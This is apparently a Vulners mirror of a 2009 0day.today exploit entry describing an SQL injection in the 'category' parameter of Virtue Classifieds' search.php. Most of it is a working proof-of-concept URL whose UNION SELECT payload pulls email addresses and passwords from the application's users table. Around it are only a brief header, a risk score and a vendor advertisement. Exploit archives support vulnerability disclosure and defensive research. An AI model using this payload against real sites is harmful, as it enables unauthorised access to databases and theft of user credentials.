Lucene search

K

Virtue Classifieds (category) SQL Injection Vulnerability

๐Ÿ—“๏ธย 08 Jun 2009ย 00:00:00Reported byย OzXTypeย 
zdt
ย zdt
๐Ÿ”—ย 0day.today๐Ÿ‘ย 18ย Views

Virtue Classifieds SQL Injection Vulnerability in category searc

Show more
Code
=========================================================
Virtue Classifieds (category) SQL Injection Vulnerability
=========================================================


#################################################################################################################################################

CMS : Virtue Classifieds
WEB : http://www.virtuenetz.com/classified/
Archivo : search.php
Variable Tipo : GET
Valor : category
Tipo : SQL Injection
Url : http:/www.site.com/search.php?category=[SQLI]

PoC:

http:/www.site.com/search.php?category=2+and+1=0+union+select+all+1,2,concat_ws(0x3A,email,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--


##################################################################################################################################################



#  0day.today [2018-01-02]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
08 Jun 2009 00:00Current
7.1High risk
Vulners AI Score7.1
18
.json
Report